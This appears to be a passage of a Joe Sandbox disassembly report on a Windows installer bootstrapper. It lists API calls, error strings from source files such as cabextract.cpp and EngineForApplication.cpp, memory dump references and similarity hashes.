                                                                                                                • NetFxChainer.cpp, xrefs: 009CD208
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                • API String ID: 2993511968-1624333943
                                                                                                                • Opcode ID: fe179ccdc19c08c219113c98971e052584afae5c03049042a7d09cadd59aa6af
                                                                                                                • Instruction ID: 2473bc48f96d47792a7cff6bfb1b75c347e9c8ed21358f099acbc05219b7153a
                                                                                                                • Opcode Fuzzy Hash: fe179ccdc19c08c219113c98971e052584afae5c03049042a7d09cadd59aa6af
                                                                                                                • Instruction Fuzzy Hash: EF116DB1200215AFCB159F68E885F5AB7E5FF49720F104169F9249B3A1C771AC10CBA4
                                                                                                                APIs
                                                                                                                • FormatMessageW.KERNEL32(009A428F,009A548E,?,00000000,00000000,00000000,?,80070656,?,?,?,009BE75C,00000000,009A548E,00000000,80070656), ref: 009A1F9A
                                                                                                                • GetLastError.KERNEL32(?,?,?,009BE75C,00000000,009A548E,00000000,80070656,?,?,009B40BF,009A548E,?,80070656,00000001,crypt32.dll), ref: 009A1FA7
                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,009BE75C,00000000,009A548E,00000000,80070656,?,?,009B40BF,009A548E), ref: 009A1FEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                • String ID: strutil.cpp
                                                                                                                • API String ID: 1365068426-3612885251
                                                                                                                • Opcode ID: 3c64dfe58b130bd5f17cd3158a9752896082c35b9baae8dae1509c4b41754e2b
                                                                                                                • Instruction ID: 9363dcaac811201757569bd510726835e4a75605849ca3b803cdefc60be7ae43
                                                                                                                • Opcode Fuzzy Hash: 3c64dfe58b130bd5f17cd3158a9752896082c35b9baae8dae1509c4b41754e2b
                                                                                                                • Instruction Fuzzy Hash: 0B016DB691512ABFDB208FD5CC09ADFBAACEB05755F114165BE04EB250E7349E009AE0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 009B0791
                                                                                                                Strings
                                                                                                                • Failed to open registration key., xrefs: 009B0748
                                                                                                                • Failed to update resume mode., xrefs: 009B0762
                                                                                                                • Failed to update name and publisher., xrefs: 009B077B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen
                                                                                                                • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                • API String ID: 47109696-1865096027
                                                                                                                • Opcode ID: c325c9278a697f56cb72cbc661b755c5d86624cd6d9b5c38131cb06761bf59b0
                                                                                                                • Instruction ID: 138f0d3b1737aa35dca68e3e905cb6a47ea1c44064f787fbd08c6f95aeea6737
                                                                                                                • Opcode Fuzzy Hash: c325c9278a697f56cb72cbc661b755c5d86624cd6d9b5c38131cb06761bf59b0
                                                                                                                • Instruction Fuzzy Hash: 8901D83294022CF7CB125685DD82BEFB669AB80B30F100155FA00B6150CB71BE50ABD0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(009EB500,40000000,00000001,00000000,00000002,00000080,00000000,009B04BF,00000000,?,009AF4F4,?,00000080,009EB500,00000000), ref: 009E4DCB
                                                                                                                • GetLastError.KERNEL32(?,009AF4F4,?,00000080,009EB500,00000000,?,009B04BF,?,00000094,?,?,?,?,?,00000000), ref: 009E4DD8
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,009AF4F4,?,009AF4F4,?,00000080,009EB500,00000000,?,009B04BF,?,00000094), ref: 009E4E2C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorFileHandleLast
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 2528220319-2967768451
                                                                                                                • Opcode ID: 8351797b38657e9ac2e227a062e7dab957261036affa531cf80f54b25eb6f787
                                                                                                                • Instruction ID: d3854f1484d4c51bde19dcca2aadbf413741a206846494f61e1f53cf26f99995
                                                                                                                • Opcode Fuzzy Hash: 8351797b38657e9ac2e227a062e7dab957261036affa531cf80f54b25eb6f787
                                                                                                                • Instruction Fuzzy Hash: 3C01F733641165B7D7335A6A9C45F5F3A58BB81B71F024314FF20AB1E1D7709C1196E0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,009C8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 009E49AE
                                                                                                                • GetLastError.KERNEL32(?,009C8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 009E49BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileLast
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 1214770103-2967768451
                                                                                                                • Opcode ID: 02517e4513b4531817fa525c537e1ea6997975f500d1e5c2bf332e36f9d485a3
                                                                                                                • Instruction ID: 9a96fccf2b4ba721c14ad24b9cc0aa2b7f004e8c773a82c6c7d6b76dc5fb152a
                                                                                                                • Opcode Fuzzy Hash: 02517e4513b4531817fa525c537e1ea6997975f500d1e5c2bf332e36f9d485a3
                                                                                                                • Instruction Fuzzy Hash: EF01D633680178B7D72226D66C4AFBB255CBB41FB1F124221FF55BE1D1C7695D1052E0
                                                                                                                APIs
                                                                                                                • ControlService.ADVAPI32(009C6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,009C6AFD,00000000), ref: 009C6C13
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,009C6AFD,00000000), ref: 009C6C1D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ControlErrorLastService
                                                                                                                • String ID: Failed to stop wusa service.$msuengine.cpp
                                                                                                                • API String ID: 4114567744-2259829683
                                                                                                                • Opcode ID: c2323ec768b75828d6d26d9dac438dfa9f46ca18c9a43e91ef560637c579f854
                                                                                                                • Instruction ID: dd3ad274736f375e013431db40cb7b97c4f643d3a446aae4c420bb05211da98b
                                                                                                                • Opcode Fuzzy Hash: c2323ec768b75828d6d26d9dac438dfa9f46ca18c9a43e91ef560637c579f854
                                                                                                                • Instruction Fuzzy Hash: 1F01AC33E4522C67D720DBA59C46FAB77A8EB48720F014129FE51AB180DA649D0156E5
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E39F4
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E3A27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocFree
                                                                                                                • String ID: `<u$xmlutil.cpp
                                                                                                                • API String ID: 344208780-3482516102
                                                                                                                • Opcode ID: cb8c9ad425f3678104319d98c4b528f293c5e032bbc4dcd2a60c0f8a7c20b284
                                                                                                                • Instruction ID: 33d523f716382c5bbe6fc68f999ab38a55d93c05e975646ac01db8705e00b418
                                                                                                                • Opcode Fuzzy Hash: cb8c9ad425f3678104319d98c4b528f293c5e032bbc4dcd2a60c0f8a7c20b284
                                                                                                                • Instruction Fuzzy Hash: F301DF31644295BBD7220A9BD80DF7B32DCEF46760F108435B840AB342C7B8CE0092A0
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E396E
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E39A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocFree
                                                                                                                • String ID: `<u$xmlutil.cpp
                                                                                                                • API String ID: 344208780-3482516102
                                                                                                                • Opcode ID: e992c74f17db932d6739d2fcfd28662dd9265d30c0bf374813866b53da71bc84
                                                                                                                • Instruction ID: 5650445a0142942a50cbb62deb9b28c249979719db50ba8adb69e8a14841683e
                                                                                                                • Opcode Fuzzy Hash: e992c74f17db932d6739d2fcfd28662dd9265d30c0bf374813866b53da71bc84
                                                                                                                • Instruction Fuzzy Hash: 0201A735245295EBD7221A9ACC09F7B36DCAF41B60F108535FD50EB342C7B4CD005691
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009E690F
                                                                                                                  • Part of subcall function 009E8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 009E8820
                                                                                                                  • Part of subcall function 009E8713: GetLastError.KERNEL32 ref: 009E882A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                                                                                • API String ID: 211557998-1658759192
                                                                                                                • Opcode ID: a3ff47ac83b339d6b632a93c294cf56bffa986a3adaf7ccd07ffd22d75841e5f
                                                                                                                • Instruction ID: 07888d465538b7f6ff60bcfdb37fa4b0597525e3784aaf5b8f0a601a367d3eed
                                                                                                                • Opcode Fuzzy Hash: a3ff47ac83b339d6b632a93c294cf56bffa986a3adaf7ccd07ffd22d75841e5f
                                                                                                                • Instruction Fuzzy Hash: CB01D6B19012AAFB8B229FCBC84185AFBA8FF243A4B60817AF514A7111D3315E10D7D0
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 009BECED
                                                                                                                • GetLastError.KERNEL32 ref: 009BECF7
                                                                                                                Strings
                                                                                                                • Failed to post elevate message., xrefs: 009BED25
                                                                                                                • EngineForApplication.cpp, xrefs: 009BED1B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagePostThread
                                                                                                                • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                • API String ID: 2609174426-4098423239
                                                                                                                • Opcode ID: 22d96bd2b37110cdd5d3ca49997d4ad98769f038f46a5c403cc0c27283cfb49d
                                                                                                                • Instruction ID: e2cb370091e71b0931201f5b59f11b09045ce5e84e48f4abd7d9114bc19ad320
                                                                                                                • Opcode Fuzzy Hash: 22d96bd2b37110cdd5d3ca49997d4ad98769f038f46a5c403cc0c27283cfb49d
                                                                                                                • Instruction Fuzzy Hash: 8FF0F633A40235ABC7215A999D09BD77B8CBF80B30B218228FF24AF1D1D7A5DC0183D0
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 009AD903
                                                                                                                • FreeLibrary.KERNEL32(?,?,009A48D7,00000000,?,?,009A548E,?,?), ref: 009AD912
                                                                                                                • GetLastError.KERNEL32(?,009A48D7,00000000,?,?,009A548E,?,?), ref: 009AD91C
                                                                                                                Strings
                                                                                                                • BootstrapperApplicationDestroy, xrefs: 009AD8FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                • String ID: BootstrapperApplicationDestroy
                                                                                                                • API String ID: 1144718084-3186005537
                                                                                                                • Opcode ID: 13d4d1e871fa2ec1082917732594f957fdf3b6c73616969d56204a732d4c3fb1
                                                                                                                • Instruction ID: 1fcba88ac8ca15a624df4e5003e853a326a65ef17fc0b3d166e0ac2ec39eea5a
                                                                                                                • Opcode Fuzzy Hash: 13d4d1e871fa2ec1082917732594f957fdf3b6c73616969d56204a732d4c3fb1
                                                                                                                • Instruction Fuzzy Hash: 8FF06832612626ABC7214F69D804B27F7A8BF457627058229E815D6921D761EC10DBD0
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E3200
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E3230
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocFree
                                                                                                                • String ID: `<u$xmlutil.cpp
                                                                                                                • API String ID: 344208780-3482516102
                                                                                                                • Opcode ID: cf436e36e9c23c39c0847983a78e6700f8b93204d4189c1bd25bb088e58c1dc2
                                                                                                                • Instruction ID: ad2150408a5f9890b044a002279ffb22976ab6dacc06152ae5172fdbd30a3dd9
                                                                                                                • Opcode Fuzzy Hash: cf436e36e9c23c39c0847983a78e6700f8b93204d4189c1bd25bb088e58c1dc2
                                                                                                                • Instruction Fuzzy Hash: E0F0BE311026D6ABC7320F86EC0CF6B77A8AB81B60F258429FD646B311C7758E1096E0
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E34AD
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E34DD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocFree
                                                                                                                • String ID: `<u$xmlutil.cpp
                                                                                                                • API String ID: 344208780-3482516102
                                                                                                                • Opcode ID: 571a619d632cb4052c813d19d0c50ec59b15052189b1f9db70006bcfae91cc31
                                                                                                                • Instruction ID: 3682327e7fd5a9057c209f4e2316afcb5881bf841bc5aedd1fb736197d2bd1ab
                                                                                                                • Opcode Fuzzy Hash: 571a619d632cb4052c813d19d0c50ec59b15052189b1f9db70006bcfae91cc31
                                                                                                                • Instruction Fuzzy Hash: FDF0B431241295ABC7331F46EC0CE6B77A8AB81B60F108516FC145F2A0D775DE1096E0
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 009BF2EE
                                                                                                                • GetLastError.KERNEL32 ref: 009BF2F8
                                                                                                                Strings
                                                                                                                • EngineForApplication.cpp, xrefs: 009BF31C
                                                                                                                • Failed to post plan message., xrefs: 009BF326
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagePostThread
                                                                                                                • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                • API String ID: 2609174426-2952114608
                                                                                                                • Opcode ID: 2655134ebcd6b0b55731359cd89ce38b6fe4e371da8ec6b4c9a7c1dd5b4aace0
                                                                                                                • Instruction ID: 9a2072d2545be17ec3d407237b8c4987e31ac0919094e4792243ccee3b00dd83
                                                                                                                • Opcode Fuzzy Hash: 2655134ebcd6b0b55731359cd89ce38b6fe4e371da8ec6b4c9a7c1dd5b4aace0
                                                                                                                • Instruction Fuzzy Hash: 56F0EC336552356BD63126E65D0AF8B7FC8EF44BF0B014021FF54AF191E665DC0082D0
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 009BF3FC
                                                                                                                • GetLastError.KERNEL32 ref: 009BF406
                                                                                                                Strings
                                                                                                                • Failed to post shutdown message., xrefs: 009BF434
                                                                                                                • EngineForApplication.cpp, xrefs: 009BF42A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagePostThread
                                                                                                                • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                • API String ID: 2609174426-188808143
                                                                                                                • Opcode ID: 4fd44f304a8908bbc6023d9bc59c7b41917a8490983f02296d2d31ecc7ca941e
                                                                                                                • Instruction ID: 281e5d33a47a906dbf42dd463ac43a55893b8cffd7b2231cb0f7e18e01cc56f2
                                                                                                                • Opcode Fuzzy Hash: 4fd44f304a8908bbc6023d9bc59c7b41917a8490983f02296d2d31ecc7ca941e
                                                                                                                • Instruction Fuzzy Hash: A1F0A73365523567C63116D66C0EF877B98AF44B70B014025BF14BF1A2E6549C0086D0
                                                                                                                APIs
                                                                                                                • SetEvent.KERNEL32(009EB478,00000000,?,009C1717,?,00000000,?,009AC287,?,009A5405,?,009B75A5,?,?,009A5405,?), ref: 009C07BF
                                                                                                                • GetLastError.KERNEL32(?,009C1717,?,00000000,?,009AC287,?,009A5405,?,009B75A5,?,?,009A5405,?,009A5445,00000001), ref: 009C07C9
                                                                                                                Strings
                                                                                                                • Failed to set begin operation event., xrefs: 009C07F7
                                                                                                                • cabextract.cpp, xrefs: 009C07ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorEventLast
                                                                                                                • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                • API String ID: 3848097054-4159625223
                                                                                                                • Opcode ID: 2ef0e9ffbe6f337a19457ef8fc89b190e3fcedfefee15444e50ab55997ee543e
                                                                                                                • Instruction ID: b81f72b2ab5bbb337087d379b518b955df419745e0c5e6dec8d7544397747540
                                                                                                                • Opcode Fuzzy Hash: 2ef0e9ffbe6f337a19457ef8fc89b190e3fcedfefee15444e50ab55997ee543e
                                                                                                                • Instruction Fuzzy Hash: 21F05C37E42235A7822012954C05F8F7A889F81BB0F014039FF14BB241E614AC10C2E6
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 009BEBE0
                                                                                                                • GetLastError.KERNEL32 ref: 009BEBEA
                                                                                                                Strings
                                                                                                                • Failed to post apply message., xrefs: 009BEC18
                                                                                                                • EngineForApplication.cpp, xrefs: 009BEC0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
